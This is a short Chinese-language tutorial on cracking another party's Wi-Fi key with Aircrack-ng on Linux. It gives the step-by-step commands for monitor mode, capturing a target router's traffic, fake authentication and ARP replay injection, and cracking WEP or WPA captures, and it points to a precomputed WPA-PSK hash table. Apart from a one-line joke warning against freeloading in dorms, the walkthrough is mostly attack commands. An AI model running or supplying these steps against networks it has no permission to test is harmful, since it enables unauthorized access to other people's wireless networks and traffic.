Aircrack-ng用法(Linux下)
Yue Liu
aircrack-ptw效率比aircrack-ng还高,不过我没用过
1. Get your wireless interface and localMAC
$ifconfig
一般是ath0或wlan0
2. Open monitor mode
#airmon-ng start wirelessInterface targetChannel /*
targetChannel是对方路由使用的频道,targetChannel,targetMAC一般都能在网络管理器如wicd里查到,monitorInterface通常是mon0,破解结束后要#airmon-ng
stop mon0 */
3. Some kind of work...
#airodump-ng -c targetChannel --bssid targetMAC -w outputName monitorInterface
/* 工作目录下会产生几个文件,如outputName-01.cap,replay-**等,如果第二次破解还用同样的outputName,就会产生outputName-02.cap等
*/
#aireplay-ng -1 0 -e targetESSID -a targetMAC -h localMAC monitorInterface
/* targetESSID是对方的ESSID标识 */
4. Fetch data
#aireplay-ng -3 -b targetMAC -h localMAC monitorInterface
5. After tens of thousands IVs fetched...
#aircrack-ng -a wep/wpa outputName-xx.cap
/*选择对方是wep加密还是wpa/wpa2加密并破解,复杂的wpa/wpa2几乎是不可破解的。
windows下参见:
http://wirelessdefence.org/Contents/Aircrack-ng_WinAircrack.htm
不可将此法用于蹭网,以免在宿舍间造成不和谐因素。。。
Yue Liu
http://aircrack-ng.org/doku.php?id=compatibility_drivers#which_is_the_best_card_to_buy
ZerOne做了个4.4GB大的国内使用频率最高的前62个SSID整理而成的WPA-PSK Hash Table,立志破解wpa的可以搜一下……